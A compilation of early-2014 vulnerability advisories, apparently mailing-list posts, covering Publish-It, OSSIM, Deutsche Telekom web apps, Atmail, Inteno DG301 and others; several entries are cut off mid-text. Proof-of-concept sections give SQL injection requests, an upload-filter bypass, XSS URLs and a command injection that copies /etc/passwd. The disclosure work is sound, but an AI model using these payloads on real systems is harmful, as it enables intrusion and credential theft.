CORE-2014-0001 - Publish-It Buffer Overflow Vulnerability
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Publish-It Buffer Overflow Vulnerability 1. *Advisory Information* Title: Publish-It Buffer Overflow Vulnerability Advisory ID: CORE-2014-0001 Advisory URL: http://www.coresecurity.com/advisories/publish-it-buffer-overflow-vulnerability Date published: 2014-02-05 Date of last update: 2014-02-05 Vendors contacted: Poster Software Release mode: User release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2014-0980 3. *Vulnerability Description* Publish-It [1] is prone to a (client side) security vulnerability when processing .PUI files. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine, by enticing the user of Publish-It to open a specially crafted .PUI file. 4. *Vulnerable Packages* . Publish-It v3.6d for Win XP. . Publish-It v3.6d for Win 7. . Other versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* There was no official answer from vendor after several attempts to report this vulnerability (see [Sec. 8]). As mitigation action, given that this is a client-side vulnerability, avoid to open untrusted .PUI files. Contact vendor for further information. 6. *Credits* This vulnerability was discovered and researched by Daniel Kazimirow from Core Exploit Writers Team. 7. *Technical Description / Proof of Concept Code* Below is shown the result of opening the Proof of concept file [2] on Windows XP SP3 (EN). /- EAX 04040404 ECX 0325 EDX FF99 EBX 77F15B70 GDI32.SelectObject ESP 0012F5D4 EBP 77F161C1 GDI32.GetStockObject ESI 0103A1E8 EDI A50107D3 EIP 04040404 C 0 ES 0023 32bit 0() P 0 CS 001B 32bit 0() A 1 SS 0023 32bit 0() Z 0 DS 0023 32bit 0() S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS NULL D 0 O 0 LastErr ERROR_SUCCESS () EFL 0212 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty -??? 0001 00010002 ST1 empty -??? 0043 004F007A ST2 empty -??? 7590A3E7 FDBDC8F2 ST3 empty -??? 0043 0050007B ST4 empty 1.000 ST5 empty -9.2233720368547758080e+18 -/ The arbitrary value 0x04040404 is stored in the EIP register where our shellcode starts (just a software breakpoint 0xCC): /- 04040404CC INT3 04040405CC INT3 04040406CC INT3 04040407CC INT3 04040408CC INT3 04040409CC INT3 0404040ACC INT3 0404040BCC INT3 ... -/ As a result, the normal execution flow can be altered in order to execute arbitrary code. 8. *Report Timeline* . 2013-12-20: Core Security Technologies attempts to contact vendor. Publication date is set for Jan 21st, 2014. . 2014-01-06: Core attempts to contact vendor. . 2014-01-15: Core asks for confirmation of the initial contact e-mail. . 2014-01-15: Vendor sends an e-mail with a single word: "Confirmed". . 2014-01-16: Core sends a technical description and asks for an estimated release date. No reply received. . 2014-01-21: First release date missed. . 2014-01-27: Core attempts to contact vendor. No reply received. . 2014-02-05: After one month and a half trying to contact vendor the only reply from them was the word "Confirmed" and the advisory CORE-2014-0001 is published as 'User release'. 9. *References* [1] http://www.postersw.com/. [2] http://www.coresecurity.com/system/files/attachments/2014/02/CORE-2014-0001-publish-it.zip 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and En
AlienVault OSSIM SQL Injection vulnerability
INDEX --- 1. Background 2. Description 3. Affected Products 4. Vulnerability 5. Solution 6. Credit 7. Disclosure Timeline 1. BACKGROUND --- OSSIM by AlienVault is an Open Source Security Information and Event Management (SIEM) platform, comprising a collection of tools designed to aid network administrator in computer security, intrusion detection and prevention. (Wikipedia) 2. DESCRIPTION --- A vulnerability has been discovered in the OSSIM's OCS Inventory web interface due toinsufficient input validation before inserting untrusted, user-supplied data into a SQL query. 3. AFFECTED PRODUCTS --- AlienVault OSSIM 4.3 4. VULNERABILITIES --- 4.1 /ocsreports/tele_stats.php 4.11 The associated query was confirmed to be running with 'root' user privileges 5. SOLUTION --- Vendor contacted and confirmed that vulnerable application was removed in recent versions. Upgrade to latest version. http://forums.alienvault.com/discussion/1873/security-advisory-all-alienvault-versions-prior-to-v4-3-3-1 6. CREDIT --- This vulnerability was discovered by Andrew Smith. 7. DISCLOSURE TIMELINE --- 1-18-2014 - Vulnerability Discovered 1-27-2014 - Vendor Informed 2-3-2014 - Public Disclosure
German Telekom Bug Bounty #11 - Remote SQL Injection Vulnerability
Document Title: === German Telekom Bug Bounty #11 - SQL Injection Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1177 Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/ Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml Release Date: = 2014-02-06 Vulnerability Laboratory ID (VL-ID): 1177 Common Vulnerability Scoring System: 8.3 Product & Service Introduction: === Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW. (Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom & http://www.telekom.com/bug-bounty ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a remote SQL Injection web vulnerability in the official Telekom website web-application. Vulnerability Disclosure Timeline: == 2013-12-30: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed) 2013-12-30: Vendor Notification (Telekom CERT Security Team) 2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team) 2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€) 2014-02-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Exploitation Technique: === Remote Severity Level: === Critical Technical Details & Description: A remote SQL Injection web vulnerability has been discovered in the official Telekom (English) Fitness Check website web application. The vulnerability allows remote attackers to inject unauthorized own sql statements to compromise the affected web-application or dbms. The sql injection vulnerability is located in `englishtest2004/test.asp` file of the englishtest2004 module (path). After executing the query through the test.asp page, the query`s result can be seen from a `500 error` returned by the `test.asp` page. The connected vulnerable parameter in the `test.aspx` file is `mailbody` that is passed through the POST method request. The SQL injection bug is in the INSERT statement. Other paramaters like VORNAME, Email, PLZ, TELEFON can be accessed by usage of a malicious insert statement. The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.3(+). Exploitation of the remote sql injection web vulnerability requires NO user interaction or a privileged web-application user account. Successful exploitation of the remote pre-auth sql injection results in dbms, web-server and web-application (context) compromise. Vulnerable Module(s): [+] /englishtest2004/ Vulnerable File(s): [+] /englishtest2004/test.asp Vulnerable Parameter(s): [+] mailbody Proof of Concept (PoC): === The SQL injection vulnerability can be exploited by remote attackers without privileged application user account and without required user inter action. For demonstration or reproduce ... a) The attacker should visit the main page to take the test https://gt.telekom.de/englishtest2004eng/html/intro.htm b) The attacker should keep clicking on next until he reaches the final step in the test which is the page of "Registration for the Fitness Check" c) In the form of registering the test, we have many fields. We fill the up the vulnerable fields and then click on "Register" button d) The attacker then should intercept the request and edit the "mailbody" paremter to an apsrophe that will generate the SQL error e) After forwarding the request, we will find the SQL error in the INSERT statement echoed back in the page The post request that has been used to reproduce the image is: POST /englishtest2004/test.asp HTTP/1.1 Host: gt.telekom.de User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm Cookie: _ga=GA1.2.1524944686.1388633141; ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK Connection: keep-alive Content-Type: application/x-www-form-urlencode
German Telekom Bug Bounty #10 - Arbitrary File Upload Vulnerability
Document Title: === German Telekom Bug Bounty #10 - Arbitrary File Upload Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1176 Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/ Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml Release Date: = 2014-02-04 Vulnerability Laboratory ID (VL-ID): 1176 Common Vulnerability Scoring System: 7.2 Product & Service Introduction: === Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW. (Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom & http://www.telekom.com/bug-bounty ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in an official German Telekom website web-application. Vulnerability Disclosure Timeline: == 2013-12-30: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed) 2013-12-30: Vendor Notification (Telekom CERT Security Team) 2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team) 2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€) 2014-02-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Deutsche Telekom (German Telecom) Product: Profil Bild Online Service - Web Application 2014 Q1 Exploitation Technique: === Remote Severity Level: === High Technical Details & Description: An arbitrary file upload web vulnerability has been discovered in the official German Telecom Profile Picture tool website web application. The web vulnerability allows remote attackers to upload an arbitrary (malicious) file to compromise the dbms, website or web-server system. The arbitrary file upload vulnerability is located in `/scripts/php/process.php` file. After executing the query through the process.php page, the query result can be seen from `/scripts/php/downloadImage.php`. Remote attackers are able to manipulate the POST method request with of the process.php file to upload unauhorized own malicious files. Exploitation of the remote web vulnerability requires no user interaction and also no privileged web application user account. Successful exploitation of the arbitrary file upload vulnerability results in web-server, web module, website or dbms compromise. Vulnerable Module(s): [+] profilbildtool Vulnerable File(s): [+] /scripts/php/process.php Proof of Concept (PoC): === The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account and without required user inter action. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below. a) The attacker should visit the main page http://profilbildtool.telekom.de/imagecropper.php?lang=en to create an image using the system b) In Choose network section: Twitter can be chosen as our network c) In Type of activity: 1) "Official use" radio button should be used 2) "Lead accounts" from the dropdown menu 3) The country should be chosen is "Austria AT" 4) in Select Logo: "T-Systems" should be used d) Types of background 1) Choose "Picture" for background 2) Browse and choose a specially crafted php or exe file. For example, we will use test.php 3) Press upload At this point we should intercept the request and change Content-Type: text/php to Content-Type: image/jpeg This will help us to bypass the type checking on the server Side The other constraint is the size of the file, We can change this by generating a specially crafted php file where the php code is in the EXIF section of the file. By this, the file will run as php correctly once its extension is php. Our request will be similiar to this ... POST /scripts/php/process.php HTTP/1.1 Host: profilbildtool.telekom.de User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://profil
CVE-2014-1214 - Remote Code Execution in Projoom NovaSFH Plugin
Vulnerability title: Remote Code Execution in Projoom NovaSFH Plugin CVE: CVE-2014-1214 Vendor: Projoom Product: NovaSFH Plugin Version: 3.0.3 Reported by: Yuri Kramarz Details: The PHP executable which is responsible for handling file upload functionality allows arbitrary files to be uploaded to any directory specified by the attackers as the file upload function does not does not verify file type or origin when processing the request. Further details at: http://www.portcullis-security.com/security-research-and-downloads/secur ity-advisories/cve-2014-1214/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. ### This email originates from the systems of Portcullis Computer Security Limited, a Private limited company, registered in England in accordance with the Companies Act under number 02763799. The registered office address of Portcullis Computer Security Limited is: The Grange Barn, Pikes End, Pinner, MIDDX, United Kingdom, HA5 2EX. The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Any opinions expressed are those of the individual and do not represent the opinion of the organisation. Access to this email by persons other than the intended recipient is strictly prohibited. If you are not the intended recipient, any disclosure, copying, distribution or other action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email is subject to the terms and conditions expressed in the applicable Portcullis Computer Security Limited terms of business. ### # This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal. #
German Telekom Bug Bounty #9 - Code Execution Vulnerability
Document Title: === German Telekom Bug Bounty #9 - Code Execution Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1174 Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/ Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml Release Date: = 2014-02-05 Vulnerability Laboratory ID (VL-ID): 1174 Common Vulnerability Scoring System: 9.4 Product & Service Introduction: === Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW. (Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom & http://www.telekom.com/bug-bounty ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a remote code execution vulnerability in the official german Telekom online-service web-application. Vulnerability Disclosure Timeline: == 2013-12-30: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed) 2013-12-30: Vendor Notification (Telekom CERT Security Team) 2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team) 2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€) 2014-02-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Deutsche Telekom (German Telecom) Product: Profil Bild Online Service - Web Application 2013 Q4 Exploitation Technique: === Remote Severity Level: === Critical Technical Details & Description: A rRemote Code Execution vulnerability has been discovered in the official Telekom online-service web-application. The remote vulnerability allows attackers to inject unauthorized system commands to compromise the affected machine. The Remote Code Execution vulnerability is located in the `downloadImage.php` and `process.php` file. The vulnerable parameter value is the `locCode`. Remote attackers can manipulate the POST method request with the ImgType values to inject/execute own php commands. Exploitation of the sql issue does not require a low privileged web-applicaton user account without user interaction. Successful exploitation of the vulnerability results in system & web-application (service) compromise. Vulnerable Module(s): [+] telekom.de (profilbildtool) Vulnerable File(s): [+] downloadImage.php [+] process.php Vulnerable Parameter(s): [+] locCode > AT Proof of Concept (PoC): === The remote code execution vulnerability can be exploited by remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. Send this request first ... POST /scripts/php/process.php HTTP/1.1 Host: profilbildtool.telekom.de User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=utf-8 Referer: http://profilbildtool.telekom.de/imagecropper.php?lang=en Content-Length: 96 Cookie:PHPSESSID=rf4kuenldjmr24q77bv293q503; BIGipServerRD-10_po_UKS_Internet=rd10oac1c0a0eo8080 Connection: keep-alive Pragma: no-cache Cache- Control: no-cache imgType=twitter&usage=official&branch=tmobile&color=magenta&txtSize=small&locCode=AT'+and+'a'='a Get the Image the image with this request ... GET /scripts/php/downloadImage.php HTTP/1.1 Host: profilbildtool.telekom.de User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://profilbildtool.telekom.de/imagecropper.php?lang=en Cookie: PHPSESSID=rf4kuenldjmr24q77bv293q503; BIGipServerRD-10_po_UKS_Internet=1 Connection: keep-alive because ... locCode=AT'+and+'a'='a is TRUE you will see that the image has "AT" in the top left corner Repeat with these two requests ... //Generate
[SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Commons FileUpload 1.0 to 1.3 - - Apache Tomcat 8.0.0-RC1 to 8.0.1 - - Apache Tomcat 7.0.0 to 7.0.50 - - Apache Tomcat 6 and earlier are not affected Apache Tomcat 7 and Apache Tomcat 8 use a packaged renamed copy of Apache Commons FileUpload to implement the requirement of the Servlet 3.0 and later specifications to support the processing of mime-multipart requests. Tomcat 7 and 8 are therefore affected by this issue. While Tomcat 6 uses Commons FileUpload as part of the Manager application, access to that functionality is limited to authenticated administrators. Description: It is possible to craft a malformed Content-Type header for a multipart request that causes Apache Commons FileUpload to enter an infinite loop. A malicious user could, therefore, craft a malformed request that triggered a denial of service. This issue was reported responsibly to the Apache Software Foundation via JPCERT but an error in addressing an e-mail led to the unintended early disclosure of this issue[1]. Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Commons FileUpload 1.3.1 or later once released - - Upgrade to Apache Tomcat 8.0.2 or later once released - - Upgrade to Apache Tomcat 7.0.51 or later once released - - Apply the appropriate patch - Commons FileUpload: http://svn.apache.org/r1565143 - Tomcat 8: http://svn.apache.org/r1565163 - Tomcat 7: http://svn.apache.org/r1565169 - - Limit the size of the Content-Type header to less than 4091 bytes Credit: This issue was reported to the Apache Software Foundation via JPCERT. References: [1] http://markmail.org/message/kpfl7ax4el2owb3o [2] http://tomcat.apache.org/security-8.html [3] http://tomcat.apache.org/security-7.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJS83P8AAoJEBDAHFovYFnnbOwP/0m80St7x63n6VCiR0aGuGLz /J004spHfbc+vtg2RumObBTX6mSfvPgO2R4FzE17Etg8QtWreoxb7kjnVXUwjdMX nb3Yt6IY1yBW1K+YcZRziOQXkRnnjnpC7Lh2o5eqpJ1S7wpXl5PBIXYSxMAsJCuv axFA0aq5cc17uDAH1z6DPk4149oZz2lHdlBUTTkCh/0PrvcIFxwpej75gUfyaV0y DGZLs3IpRYcJMS131q72DUt9wBsIqJN0mqUOq2svBS3mlXBcKDjy21b8QiEr8itK UqwsYUtOZP4nZ4u8j6euxF2fC/ivm/930OGOl9pn2SbkoHJKm/4rz2GYDA9jq07K XEDeGdTx3ZuDaTaBER8xquETRZ/Rb8dbBxQwzmo6doJNOjsMQFlR+1F+p56AhYd0 klbT6Q7i/Ic3BdRJkUpaYshhtXeAOnH+0u9j4kRXMgJbkMgOacopomFX6HoXr9/i RHGbwwSZViLooR88Yg0FU2230+9mJLXxaJ6usHrtq4dS9ElSV320OCyisNjMX5hi 5SFYMSy+z0nsK2O6yCzlukztoFhvaNecvy3I8w5EKytweyFlPzxXn6QpQjG+ffb5 ql7TZRrApiaewp4crzBcZSAjDzRNiQpcI2xTTN/H9u/yk8lrhOULi4pljKCudvmM eIWblFdpoPVl0iqvsXA9 =uzLf -END PGP SIGNATURE-
[SECURITY] [DSA 2855-1] libav security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2855-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff February 05, 2014 http://www.debian.org/security/faq - - Package: libav Vulnerability : several Problem type : local Debian-specific: no CVE ID : CVE-2011-3944 CVE-2013-0845 CVE-2013-0846 CVE-2013-0849 CVE-2013-0865 CVE-2013-7010 CVE-2013-7014 CVE-2013-7015 Several security issues have been corrected in multiple demuxers and decoders of the libav multimedia library. The IDs mentioned above are just a portion of the security issues fixed in this update. A full list of the changes is available at http://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v0.8.10 For the stable distribution (wheezy), these problems have been fixed in version 6:0.8.9-1. For the unstable distribution (sid), these problems have been fixed in version 6:9.11-1. We recommend that you upgrade your libav packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAlLye6kACgkQXm3vHE4uylrI8ACfbD6s1L9JSjxy9tKale/31uwM faUAn245iY8Wf396t+iT1Q7iaP7s8/Xo =bajx -END PGP SIGNATURE-
[ISecAuditors Security Advisories] Multiple reflected XSS vulnerabilities in Atmail WebMail
= INTERNET SECURITY AUDITORS ALERT 2013-014 - Original release date: March 25th, 2013 - Last revised: March 25th, 2013 - Discovered by: Vicente Aguilera Diaz - Severity: 4.3/10 (CVSSv2 Base Scored) - CVE-ID: CVE-2013-6229 = I. VULNERABILITY - Multiple reflected XSS vulnerabilities in Atmail WebMail. II. BACKGROUND - Atmail allows users to access IMAP Mailboxes of any server of your choice. The software provides a comprehensive email-suite for accessing user mailboxes, and provides an inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems. III. DESCRIPTION - Has been detected multiple reflected XSS vulnerability: 1) in the view attachment message process 2) in the search message with filter process 3) in the delete message process These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - 1) View attachment message process When a user opens a file attachment in an email, the link is as follows: http:///index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId//filenameOriginal/ where: - is the Atmail WebMail server - is the unique ID for the message that contains the attachment - is the attachment file in the message A malicious user can inject arbitrary HTML/script code in the parameter. For example: http:///index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId//filenameOriginal/test .txtThis+is+an+XSS+example 2) Search message with filter process When a user search messages with a filter (for example, using the "Friends" filter), the link is as follows: POST /index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchRes ultsTab5 HTTP/1.1 Host: ... searchQuery=&goBack=6&from=&to=&subject=&body=&filter= where: - is the Atmail WebMail server - is the name of the selected filter by the user A malicious user can inject arbitrary HTML/script code in the parameter. Also, This POST HTTP Request can become a GET HTTP Request, making it easier to exploit the vulnerability. For example: http:///index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/se archResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=friendsThis +is+an+XSS+example 3) Delete message process When a user select and delete a message, the link is as follows: POST /index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash HTTP/1.1Host: ... resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B %5D=&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen %5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen %5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0 where: - is the Atmail WebMail server - is the identifier (number) of the mail selected by the user A malicious user can inject arbitrary HTML/script code in the parameter. Also, This POST HTTP Request can become a GET HTTP Request, making it easier to exploit the vulnerability. For example: http:///index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash? resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B %5D=This+is+an+XSS+example&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen %5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen %5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen %5B2%5D=0&unseen%5B1%5D=0 V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - Tested in Atmail 7.0.2. Other versions may be affected too. VII. SOLUTION - - VIII. REFERENCES - http://www.atmail.com http://www.isecauditors.com IX. CREDITS - This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com). X. REVISION HISTORY - March 9, 2013: Initial release March 22, 2013: Last revision XI. DISCLOSURE TIMELINE - March 9, 2013: Discovered by Internet Security Auditors March 22, 2013: Advisory updated with new XSS vulnerable resources October08, 2013: Firt contact with developer team October16, 2013: Second contact with developer team November 28, 2013: Third contact with developer team January10, 2014: Last contact and release XII. LEGAL NO
Inteno DG301 Command Injection
1.Background According to the vendor, Inteno DG301 is a high-end Multi-WAN residential gateway with advanced router and bridge functions. 2.Summary Inteno DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire 10.03.1-RC6 is vulnerable to command injection, which can be exploited directly from the login form on the web interface. The vulnerability could be exploited by unauthenticated attackers. Successful exploitation would allow attackers to execute arbitrary commands with root privileges. 3.Affected Products DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire 10.03.1-RC6. Other products or previous versions may also be vulnerable. 4.Vulnerability and Proof of Concept (PoC) The login form presented on the web administration interface (username parameter) is vulnerable to command injection, due to the application does not validate the user input in a proper manner. The following PoC includes a POST request that should be sent to the device via web. The request includes a command that will copy the contents of "/etc/passwd" to a file "test.txt" on the root web folder were the web administration interface is published. POST /cgi-bin/luci HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 Gecko/20100101 Firefox Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: sysauth=55f19d843ebf2de094b8a8a2acf5c3a7; sysauth= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 60 username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass After the request is sent, proceed to visit http:///test.txt. This should display the contents of "/etc/passwd", including the root password in encrypted (DES) form. From here, the root credentials could be cracked in a reasonable amount of time. This attack could also be used for enabling services (e.g. SSH), or running any other arbitrary commands. A general implementation of this PoC can be found here: http://www.encripto.no/tools/inteno-DG301-PoC.tar.gz 5.Remediation The vendor has released a new firmware version - 1.6.8RC3. Users are encouraged to update their devices in order to patch the vulnerability. 6.Credit The vulnerability was originally discovered in an Inteno DG301 device (manufactured Nov. 2013), by Juan J. Güelfo at Encripto AS. E-mail: p...@encripto.no Web: http://www.encripto.no For more information about Encripto's research policy, please visit http://www.encripto.no/forskning/ 7.Timeline 24th of January 2014 - Vulnerabilities discovered by the researcher. 26th of January 2014 - Vulnerability details disclosed to the vendor. 31st of January 2014 - New firmware version launched by the vendor, which addresses the vulnerability. 3rd of February 2014 - Public disclosure. 8.References http://www.encripto.no/forskning/whitepapers/Inteno_DG301_advisory_feb_2014.pdf http://www.encripto.no/tools/inteno-DG301-PoC.tar.gz DISCLAIMER The material presented in this document is for educational purposes only. Encripto AS cannot be responsible for any loss or damage carried out by any technique presented in this material. The reader is the only one responsible for applying this knowledge, which is at his / her own risk. Any of the trademarks, service marks, collective marks, design rights, personality rights or similar rights that are mentioned, used or cited in this document is property of their respective owners.
[SECURITY] [DSA 2853-1] horde3 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2853-1 secur...@debian.org http://www.debian.org/security/ Luciano Bello February 05, 2014 http://www.debian.org/security/faq - - Package: horde3 Vulnerability : Remote code execution Problem type : remote Debian-specific: no CVE ID : CVE-2014-1691 Debian Bug : 737149 Pedro Ribeiro from Agile Information Security found a possible remote code execution on Horde3, a web application framework. Unsanitized variables are passed to the unserialize() PHP function. A remote attacker could specially-crafted one of those variables allowing her to load and execute code. For the oldstable distribution (squeeze), this problem has been fixed in version 3.3.8+debian0-3. In the testing (jessie) and unstable (sid) distributions, Horde is distributed in the php-horde-util package. This problem has been fixed in version 2.3.0-1. We recommend that you upgrade your horde3 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlLyKAcACgkQQWTRs4lLtHlWcACfT0u21jD6K068z14ulj6O5a5D lhoAoK0KKLs0hF68bUtFPo6DmFauGmpa =wdfw -END PGP SIGNATURE-
SQL Injection in doorGets CMS
